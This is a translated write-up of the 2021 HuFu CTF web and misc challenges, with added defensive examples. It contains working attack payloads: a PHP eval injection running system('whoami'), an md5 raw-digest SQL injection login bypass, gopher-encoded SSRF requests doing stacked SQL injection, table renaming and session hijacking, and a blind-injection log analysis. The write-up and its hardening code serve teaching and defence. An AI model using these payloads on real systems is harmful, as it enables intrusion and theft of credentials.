2021 Digital China HuFu (虎符) CTF Partial Writeup

WEB

Sign-in (签到)

Before the hint was released this was a fake sign-in challenge; after the hint it became a real one.

[screenshot]

I had read the news a few days earlier that this project contained a backdoor, so I went straight to that news report and the code.

[screenshot]

The malicious RCE and how it is triggered:

[screenshot]

Just fire it off:

[screenshot]

Command execution; a cat /flag is all it takes.

unsetme

[screenshot]

Search for the corresponding code to identify the PHP template framework the challenge uses.

[screenshot]

Pull the code down from GitHub, open base.php, and look at the places where unset appears.

[screenshot]

An eval() call appears here. Reading the code around it: to reach code execution through this eval with input we control, the payload has to close the preceding array and the unset call and then comment out the rest of the line:

:[]);system("whoami");//

[screenshot]

Code execution succeeds and the flag is obtained.

[screenshot]

"Do it slowly" management system ("慢慢做"管理系统)

[screenshot]

An interesting challenge; the challenge description matters a lot.

According to the hint, the first step is a SQL injection that goes through md5, much like the 实验吧 (shiyanbar) challenge. The 实验吧 payload is blocked here, though, so we use a different one:

[screenshot]

username=admin&password=129581926211651571912466741651878684928
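Why a raw-binary md5 spliced into a query is injectable, and what the hardened form looks like, as an added example that is not part of this writeup. It assumes the 实验吧-style pattern the hint points at (the application concatenates md5($password, true) into its SQL as text) and uses an in-memory SQLite table with a constructed credential in place of the challenge's MySQL database; the test string ffifdyop is the classic one from that earlier challenge, whose raw digest begins with 'or'.

```python
import hashlib
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the login table; the stored value is the
    # hex md5 of a constructed secret, as a typical app of this kind would keep it.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)",
               ("admin", hashlib.md5(b"not-the-real-password").hexdigest()))
    return db


def raw_md5_as_text(password):
    # md5($pw, true) yields 16 raw bytes; treating them as text is what lets a
    # quote byte (0x27) reach the SQL parser as a string delimiter.
    return hashlib.md5(password.encode()).digest().decode("latin-1")


def vulnerable_login(db, username, password):
    # Assumed vulnerable pattern: raw digest concatenated straight into the query.
    query = "SELECT username FROM users WHERE username='%s' AND password='%s'" % (
        username, raw_md5_as_text(password))
    return db.execute(query).fetchall()


def safe_login(db, username, password):
    # Hardened form: values are bound, and the hex digest never contains quotes.
    query = "SELECT username FROM users WHERE username=? AND password=?"
    digest = hashlib.md5(password.encode()).hexdigest()
    return db.execute(query, (username, digest)).fetchall()


def has_sql_fragment(password):
    # Code-review check: does the raw digest carry a quote followed by or / = ?
    raw = hashlib.md5(password.encode()).digest()
    return b"'or'" in raw or b"'='" in raw


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", vulnerable_login(db, "admin", "ffifdyop"))
    print("hardened:  ", safe_login(db, "admin", "ffifdyop"))
```

SQLite applies the same numeric-prefix conversion MySQL does when the string '6...' that follows 'or' is evaluated as a condition, so the in-memory table reproduces the bypass; the fix is the bound parameters and text-safe digest in safe_login (and, outside a CTF, a real password hash rather than md5 at all).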

After logging in we are told to submit a gopher URL.

[screenshot]

Since this is SSRF, we use the gopher protocol to reach the internal service and carry out the injection there. admin.php has a POST form, so construct a POST request:

POST /admin.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 37

username=admin' or 1=1 #&password=123

Convert it into a gopher payload; the encoding is done with Python:

from urllib.parse import quote

# Raw HTTP request to wrap in a gopher:// URL (Content-Length must match the body)
test = \
"""POST /admin.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 37

username=admin' or 1=1 #&password=123

"""
# CR (回车): percent-encode once, then turn bare LF line endings into CRLF
tmp = quote(test)
new = tmp.replace('%0A', '%0D%0A')
# Encode a second time because the gopher URL itself travels inside a POST parameter
result = '_' + quote(new)
# single-encoded variant, if the target decodes only once:
# result = '_' + new
common = "gopher://127.0.0.1:80/"
print(quote(common) + result)

Result:

gopher%3A//127.0.0.1%3A80/_POST%2520/admin.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252037%250D%250A%250D%250Ausername%253Dadmin%2527%2520or%25201%253D1%2520%2523%2526password%253D123%250D%250A%250D%250A
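The server-side check that would have stopped this step, added here as an example and not code from the challenge: an outbound-URL validator for the fetcher behind the gopher submission. It allows only http and https, refuses credentials in the URL, and resolves the host through an injected resolver so that loopback and private ranges are rejected before any connection is made; the resolver table, the hostnames and the public address in it are constructed for the example.

```python
import ipaddress
from urllib.parse import urlsplit, unquote

ALLOWED_SCHEMES = {"http", "https"}

# Constructed resolver table so the check runs offline; a real deployment would call
# getaddrinfo() and reuse the returned addresses for the actual connection (no re-lookup).
SAMPLE_DNS = {
    "localhost": ["127.0.0.1"],
    "intranet.example": ["10.0.0.5"],
    "public.example": ["93.184.216.34"],
}


def sample_resolve(host):
    return SAMPLE_DNS.get(host.lower(), [])


def is_blocked_address(ip_text):
    addr = ipaddress.ip_address(ip_text)
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def validate_fetch_url(url, resolve=sample_resolve):
    """Return (ok, reason) for a URL the application is asked to fetch server-side."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed: %r" % parts.scheme
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        targets = [str(ipaddress.ip_address(host))]   # literal IP, no lookup needed
    except ValueError:
        targets = resolve(host)
    if not targets:
        return False, "unresolvable host"
    for ip_text in targets:
        if is_blocked_address(ip_text):
            return False, "host resolves to blocked address %s" % ip_text
    return True, "ok"


# The writeup's payload as the application sees it after its single URL decode
WRITEUP_PAYLOAD = unquote("gopher%3A//127.0.0.1%3A80/_POST%2520/admin.php%2520HTTP/1.1")

if __name__ == "__main__":
    for candidate in (WRITEUP_PAYLOAD, "http://127.0.0.1/admin.php",
                      "http://intranet.example/", "https://public.example/report"):
        print(candidate, "->", validate_fetch_url(candidate))
```

Checking the resolved addresses rather than the hostname text is what catches localhost, internal names and IPv6 loopback alike; with a real resolver, decimal or hex forms of 127.0.0.1 that getaddrinfo() accepts land in the same check.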

Submit it and look at the result:

[screenshot]

The data comes back as an array, which suggests stacked injection is possible, so construct the payload:

gopher%3A//127.0.0.1%3A80/_POST%2520/admin.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252045%250D%250A%250D%250Ausername%253Dadmin%2527%253Bshow%2520databases%253B%2523%2526password%253D123%250D%250A%250D%250A

There are three databases:

[screenshot]

List the tables in ctf2:

gopher%3A//127.0.0.1%3A80/_POST%2520/admin.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252051%250D%250A%250D%250Ausername%253Dadmin%2527%253Buse%2520ctf2%253Bshow%2520tables%253B%2523%2526password%253D123%250D%250A%250D%250A

[screenshot]

Testing shows that keywords such as select and prepare are filtered, so we can use the approach from the 2019 QWB (强网杯) challenge: rename the tables to read the data.

POST /admin.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 141

username=admin';use ctf2;rename table `fake_admin` to `fake_admin1`;rename table `real_admin_here_do_you_find` to `fake_admin`;#&password=123

gopher%3A//127.0.0.1%3A80/_POST%2520/admin.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%2520141%250D%250A%250D%250Ausername%253Dadmin%2527%253Buse%2520ctf2%253Brename%2520table%2520%2560fake_admin%2560%2520to%2520%2560fake_admin1%2560%253Brename%2520table%2520%2560real_admin_here_do_you_find%2560%2520to%2520%2560fake_admin%2560%253B%2523%2526password%253D123%250D%250A%250D%250A

Use the universal password again to view the contents:

[screenshot]

Password obtained. Read the problem statement carefully here: it says to submit the real admin's password, so the username we log in with is admin and the password is the one just retrieved. Construct the request:

POST /admin.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

username=admin&password=5fb4e07de914cfc82afb44vbaf402203

gopher%3A//127.0.0.1%3A80/_POST%2520/admin.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252056%250D%250A%250D%250Ausername%253Dadmin%2526password%253D5fb4e07de914cfc82afb44vbaf402203%250D%250A%250D%250A

[screenshot]

The response carries a cookie and a 302 redirect; add that cookie to the constructed HTTP headers and request flag.php:

GET /flag.php HTTP/1.1
Host: 127.0.0.1
Cookie: PHPSESSID=ttmid17emjg67vco1bn5db45l7;

gopher%3A//127.0.0.1%3A80/_GET%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250ACookie%253A%2520PHPSESSID%253Dttmid17emjg67vco1bn5db45l7%253B%250D%250A%250D%250A

Flag obtained.

[screenshot]

Misc

Can you do log analysis? (你会日志分析吗)

A fairly basic blind-injection log audit; first read the SQL statement carefully.

[screenshot]

Time-based blind injection: when the ASCII value of the probed flag character equals the compared value, i.e. the condition is true, sleep(2) runs; otherwise it does not. So the approach is simple: judge by the timing difference, or equally by the response length being 377. The data extracted in the end is base64-encoded:

ZmxhZ3tZb3VfYXJlX3NvX2dyZWF0eQ==

#flag{You_are_so_great}
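The log-side recovery described above, as an added example rather than the writeup's own script. It builds a constructed Apache-style access log for a time-based probe of the assumed form if(ascii(substr(...,pos,1))=N,sleep(2),0), keeps only the requests whose response length is 377 (the true-branch size noted in the writeup), and reassembles and base64-decodes the extracted string; the secret in the sample log is constructed and is not the challenge's flag.

```python
import base64
import re
from urllib.parse import quote, unquote

TRUE_LENGTH = 377   # response size on the sleep()/true branch, taken from the writeup


def build_sample_log(secret_b64="ZmxhZ3tkZW1vfQ=="):
    # Constructed sample: one access-log line per probe. For every position the
    # attacker is modelled as making two wrong guesses (shorter response) and then
    # the right one (response length 377). The secret is base64 of "flag{demo}".
    lines = []
    for pos, ch in enumerate(secret_b64, start=1):
        for guess, length in ((ord(ch) - 1, 205), (ord(ch) + 1, 205), (ord(ch), TRUE_LENGTH)):
            payload = ("1' and if(ascii(substr((select data from secret),%d,1))=%d,sleep(2),0)-- "
                       % (pos, guess))
            lines.append('127.0.0.1 - - [07/Apr/2021:12:00:00 +0800] "GET /index.php?id=%s HTTP/1.1" 200 %d'
                         % (quote(payload), length))
    # unrelated traffic that the parser must ignore
    lines.append('127.0.0.1 - - [07/Apr/2021:12:00:01 +0800] "GET /index.php HTTP/1.1" 200 1024')
    return lines


REQUEST = re.compile(r'"GET (\S+) HTTP/1\.[01]" (\d{3}) (\d+)')
PROBE = re.compile(r"substr\(.*?,(\d+),1\)\)=(\d+)")


def recover_from_log(lines):
    # Map position -> character for every probe whose response has the true-branch length.
    found = {}
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        path, length = m.group(1), int(m.group(3))
        probe = PROBE.search(unquote(path))
        if not probe or length != TRUE_LENGTH:
            continue
        pos, code = int(probe.group(1)), int(probe.group(2))
        found[pos] = chr(code)
    return "".join(found[i] for i in sorted(found))


def decode_secret(lines):
    return base64.b64decode(recover_from_log(lines)).decode()


if __name__ == "__main__":
    log = build_sample_log()
    print(recover_from_log(log))
    print(decode_secret(log))
```

When the log records no response length, the same loop can key on the request timestamps instead: a true branch is the probe whose successor arrives at least two seconds later, matching the sleep(2) in the query.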
